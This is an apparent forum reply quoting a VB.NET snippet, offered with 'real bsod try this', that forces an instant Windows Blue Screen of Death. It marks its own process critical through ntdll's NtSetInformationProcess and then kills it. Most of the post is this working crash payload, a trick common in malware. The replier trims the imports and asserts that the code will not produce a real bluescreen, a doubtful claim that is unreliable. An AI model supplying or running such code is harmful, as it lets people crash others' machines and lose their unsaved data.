07-04-2011, 06:54 PM
(This post was last modified: 07-04-2011, 06:58 PM by AceInfinity.)
(07-04-2011, 06:39 PM)t0fxREAL Wrote: real bsod try this :
Code:'Release Date : 10/5/2010
'Credits : AeonHack,Devil's Child,Wrox Programming
'Purpose : Instant Bluescreen Of Death(BSOD)
Imports System
Imports System.Diagnostics
Imports System.Runtime.InteropServices
Public Class mBlueScreen
<DllImport("ntdll")> _
Shared Function NtSetInformationProcess(ByVal p As IntPtr, ByVal c As Integer, ByRef i As Integer, ByVal l As Integer) As Integer
End Function
Public Shared Sub BSOD()
Dim mProc As Process = Process.GetCurrentProcess()
NtSetInformationProcess(mProc.Handle, 29, 1, 4)
mProc.Kill()
End Sub
End Class
All you need for imports on the code I see is
Code:
Imports System.Runtime.InteropServices
The rest is useless, but that's not going to give you a real bluescreen, killing the process of that dll if you managed wouldn't be the same as deleting it. Although i'd advise not to.